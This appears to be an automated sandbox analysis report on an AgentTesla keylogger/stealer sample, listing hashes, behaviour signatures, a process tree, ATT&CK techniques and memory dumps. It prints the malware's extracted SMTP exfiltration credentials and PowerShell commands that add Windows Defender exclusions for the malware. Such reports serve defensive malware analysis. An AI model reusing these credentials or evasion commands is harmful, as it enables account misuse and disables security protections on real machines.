Overview

overview

10

Static

static

omass.exe

windows7_x64

10

omass.exe

windows10_x64

10

Analysis

  • max time kernel
    97s
  • max time network
    104s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    20-01-2021 16:25

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    omass.exe

  • Size

    36KB

  • MD5

    aaa69c3544561ed70b13847f6ec763e9

  • SHA1

    1e53ed306bd193cffa691f51f940e908ef18cf4b

  • SHA256

    cfa46220d1b96e515eedbb82a0285229467f377ede30f732f7f6c48caba3ae1e

  • SHA512

    b922f8bdbcc6ee25b635965a24ae87b8d129a8ac7cdd0458e5ddd1c5a62ede6f34b4a5c704fd6a08988f93ab4af424a95b18a563760d8dd584bb5eeba7062016

Score
10/10
agentteslaevasionkeyloggerpersistencespywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:     smtp
  • Host:
    mail.privateemail.com
  • Port:
    587
  • Username:
    ashfaq.ali@nationalfuels.pw
  • Password:
    @Mexico1.,

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
    persistence
  • Turns off Windows Defender SpyNet reporting 2 TTPs
    evasion
  • Windows security bypass 2 TTPs
    evasiontrojan
  • AgentTesla Payload 3 IoCs
  • Looks for VirtualBox Guest Additions in registry 2 TTPs
    evasion
  • Looks for VMWare Tools registry key 2 TTPs
    evasion
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 2 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spyware
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spyware
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spyware
  • Windows security modification 2 TTPs 11 IoCs
    evasiontrojan
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 16 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 40 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\omass.exe
    "C:\Users\Admin\AppData\Local\Temp\omass.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Checks BIOS information in registry
    • Drops startup file
    • Windows security modification
    • Adds Run key to start application
    • Maps connected drives based on registry
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4760
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\omass.exe" -Force
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2084
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\omass.exe" -Force
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3324
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\omass.exe" -Force
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:672
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\omass.exe" -Force
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1080
    • C:\Users\Admin\AppData\Local\Temp\omass.exe
      "C:\Users\Admin\AppData\Local\Temp\omass.exe"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      PID:2180
    • C:\Users\Admin\AppData\Local\Temp\omass.exe
      "C:\Users\Admin\AppData\Local\Temp\omass.exe"
      2⤵
        PID:3220
      • C:\Users\Admin\AppData\Local\Temp\omass.exe
        "C:\Users\Admin\AppData\Local\Temp\omass.exe"
        2⤵
          PID:2572
        • C:\Users\Admin\AppData\Local\Temp\omass.exe
          "C:\Users\Admin\AppData\Local\Temp\omass.exe"
          2⤵
            PID:2980
          • C:\Users\Admin\AppData\Local\Temp\omass.exe
            "C:\Users\Admin\AppData\Local\Temp\omass.exe"
            2⤵
              PID:1660

          Network

          MITRE ATT&CK Matrix ATT&CK v6

          Initial Access

          Execution

          Persistence

          Winlogon Helper DLL

          1
          T1004

          Registry Run Keys / Startup Folder

          1
          T1060

          Privilege Escalation

          Defense Evasion

          Modify Registry

          5
          T1112

          Disabling Security Tools

          3
          T1089

          Virtualization/Sandbox Evasion

          2
          T1497

          Credential Access

          Credentials in Files

          3
          T1081

          Discovery

          Query Registry

          4
          T1012

          Virtualization/Sandbox Evasion

          2
          T1497

          System Information Discovery

          3
          T1082

          Peripheral Device Discovery

          1
          T1120

          Lateral Movement

          Collection

          Data from Local System

          3
          T1005

          Exfiltration

          Command and Control

          Web Service

          1
          T1102

          Impact

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
            MD5

            1c19c16e21c97ed42d5beabc93391fc5

            SHA1

            8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68

            SHA256

            1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05

            SHA512

            7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

            Download Submit
          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            MD5

            d3d9dfad4ad3c9a8a90f27831f0997d7

            SHA1

            5477bdecf43f52decf82b410c8eeacc4e9de1d75

            SHA256

            8f969418c3b68e1e97d9244623aba105d77ce78a828ca5d238d6766e3b44c412

            SHA512

            56a410b38a4b7991e12a71df12a7f6c473f9ca5cd9b01b0f03375dd30729ce35b60a9050d24a5d1187674310178bff84a0d6c2ca4b54d9965744ed7d34d196ec

            Download Submit
          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            MD5

            d3d9dfad4ad3c9a8a90f27831f0997d7

            SHA1

            5477bdecf43f52decf82b410c8eeacc4e9de1d75

            SHA256

            8f969418c3b68e1e97d9244623aba105d77ce78a828ca5d238d6766e3b44c412

            SHA512

            56a410b38a4b7991e12a71df12a7f6c473f9ca5cd9b01b0f03375dd30729ce35b60a9050d24a5d1187674310178bff84a0d6c2ca4b54d9965744ed7d34d196ec

            Download Submit
          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            MD5

            75165e5a66ea633cab9272eb5701e9a1

            SHA1

            79f399ee3fea92e060d800b99723a12e762cc2d8

            SHA256

            cb4d3eaae7c4b10466efa97fb456dffb14763a766aa40c96871d1fe39e421696

            SHA512

            3cb1a1b85a3cd7191c3ba71c71caacff98967c00783280de71a3a9935beafef7e86756ace9bc556872ce24bdf88c99a3e524cfbc6d2eae9227f26c2d4466d65c

            Download Submit
          • memory/672-14-0x0000000000000000-mapping.dmp
            Download
          • memory/672-118-0x000000007E820000-0x000000007E821000-memory.dmp
            Filesize

            4KB

            Download
          • memory/672-38-0x0000000007242000-0x0000000007243000-memory.dmp
            Filesize

            4KB

            Download
          • memory/672-36-0x0000000007240000-0x0000000007241000-memory.dmp
            Filesize

            4KB

            Download
          • memory/672-75-0x0000000008660000-0x0000000008661000-memory.dmp
            Filesize

            4KB

            Download
          • memory/672-20-0x0000000073150000-0x000000007383E000-memory.dmp
            Filesize

            6.9MB

            Download
          • memory/672-134-0x0000000007243000-0x0000000007244000-memory.dmp
            Filesize

            4KB

            Download
          • memory/1080-25-0x0000000073150000-0x000000007383E000-memory.dmp
            Filesize

            6.9MB

            Download
          • memory/1080-28-0x0000000004C60000-0x0000000004C61000-memory.dmp
            Filesize

            4KB

            Download
          • memory/1080-17-0x0000000000000000-mapping.dmp
            Download
          • memory/1080-145-0x00000000097F0000-0x00000000097F1000-memory.dmp
            Filesize

            4KB

            Download
          • memory/1080-137-0x0000000009800000-0x0000000009801000-memory.dmp
            Filesize

            4KB

            Download
          • memory/1080-127-0x0000000009850000-0x0000000009851000-memory.dmp
            Filesize

            4KB

            Download
          • memory/1080-123-0x000000007F000000-0x000000007F001000-memory.dmp
            Filesize

            4KB

            Download
          • memory/1080-135-0x0000000004C63000-0x0000000004C64000-memory.dmp
            Filesize

            4KB

            Download
          • memory/1080-31-0x0000000004C62000-0x0000000004C63000-memory.dmp
            Filesize

            4KB

            Download
          • memory/2084-33-0x0000000004E72000-0x0000000004E73000-memory.dmp
            Filesize

            4KB

            Download
          • memory/2084-115-0x0000000008C10000-0x0000000008C11000-memory.dmp
            Filesize

            4KB

            Download
          • memory/2084-26-0x0000000004E70000-0x0000000004E71000-memory.dmp
            Filesize

            4KB

            Download
          • memory/2084-12-0x0000000000000000-mapping.dmp
            Download
          • memory/2084-15-0x0000000073150000-0x000000007383E000-memory.dmp
            Filesize

            6.9MB

            Download
          • memory/2084-120-0x0000000009860000-0x0000000009861000-memory.dmp
            Filesize

            4KB

            Download
          • memory/2084-72-0x0000000008160000-0x0000000008161000-memory.dmp
            Filesize

            4KB

            Download
          • memory/2084-133-0x0000000004E73000-0x0000000004E74000-memory.dmp
            Filesize

            4KB

            Download
          • memory/2084-79-0x0000000008A50000-0x0000000008A51000-memory.dmp
            Filesize

            4KB

            Download
          • memory/2084-54-0x00000000078D0000-0x00000000078D1000-memory.dmp
            Filesize

            4KB

            Download
          • memory/2084-106-0x000000007E5C0000-0x000000007E5C1000-memory.dmp
            Filesize

            4KB

            Download
          • memory/2180-37-0x000000000043748E-mapping.dmp
            Download
          • memory/2180-159-0x0000000004DF1000-0x0000000004DF2000-memory.dmp
            Filesize

            4KB

            Download
          • memory/2180-35-0x0000000000400000-0x000000000043C000-memory.dmp
            Filesize

            240KB

            Download
          • memory/2180-39-0x0000000073150000-0x000000007383E000-memory.dmp
            Filesize

            6.9MB

            Download
          • memory/2180-131-0x00000000051B0000-0x00000000051B1000-memory.dmp
            Filesize

            4KB

            Download
          • memory/2180-62-0x0000000004DF0000-0x0000000004DF1000-memory.dmp
            Filesize

            4KB

            Download
          • memory/2572-46-0x000000000043748E-mapping.dmp
            Download
          • memory/2980-50-0x000000000043748E-mapping.dmp
            Download
          • memory/3220-41-0x000000000043748E-mapping.dmp
            Download
          • memory/3220-43-0x0000000073150000-0x000000007383E000-memory.dmp
            Filesize

            6.9MB

            Download
          • memory/3324-13-0x0000000000000000-mapping.dmp
            Download
          • memory/3324-56-0x0000000006E10000-0x0000000006E11000-memory.dmp
            Filesize

            4KB

            Download
          • memory/3324-87-0x0000000008BD0000-0x0000000008C03000-memory.dmp
            Filesize

            204KB

            Download
          • memory/3324-112-0x000000007EDB0000-0x000000007EDB1000-memory.dmp
            Filesize

            4KB

            Download
          • memory/3324-60-0x0000000007760000-0x0000000007761000-memory.dmp
            Filesize

            4KB

            Download
          • memory/3324-136-0x0000000006973000-0x0000000006974000-memory.dmp
            Filesize

            4KB

            Download
          • memory/3324-32-0x0000000006972000-0x0000000006973000-memory.dmp
            Filesize

            4KB

            Download
          • memory/3324-29-0x0000000006970000-0x0000000006971000-memory.dmp
            Filesize

            4KB

            Download
          • memory/3324-19-0x0000000004320000-0x0000000004321000-memory.dmp
            Filesize

            4KB

            Download
          • memory/3324-21-0x0000000006FB0000-0x0000000006FB1000-memory.dmp
            Filesize

            4KB

            Download
          • memory/3324-16-0x0000000073150000-0x000000007383E000-memory.dmp
            Filesize

            6.9MB

            Download
          • memory/4760-2-0x0000000073150000-0x000000007383E000-memory.dmp
            Filesize

            6.9MB

            Download
          • memory/4760-11-0x0000000006BE0000-0x0000000006BE1000-memory.dmp
            Filesize

            4KB

            Download
          • memory/4760-34-0x0000000006C90000-0x0000000006C91000-memory.dmp
            Filesize

            4KB

            Download
          • memory/4760-10-0x0000000006A00000-0x0000000006A64000-memory.dmp
            Filesize

            400KB

            Download
          • memory/4760-9-0x00000000067A0000-0x00000000067A1000-memory.dmp
            Filesize

            4KB

            Download
          • memory/4760-8-0x0000000006810000-0x0000000006811000-memory.dmp
            Filesize

            4KB

            Download
          • memory/4760-7-0x0000000005AD0000-0x0000000005AD1000-memory.dmp
            Filesize

            4KB

            Download
          • memory/4760-6-0x0000000005770000-0x0000000005771000-memory.dmp
            Filesize

            4KB

            Download
          • memory/4760-5-0x0000000005C70000-0x0000000005C71000-memory.dmp
            Filesize

            4KB

            Download
          • memory/4760-3-0x0000000000F10000-0x0000000000F11000-memory.dmp
            Filesize

            4KB

            Download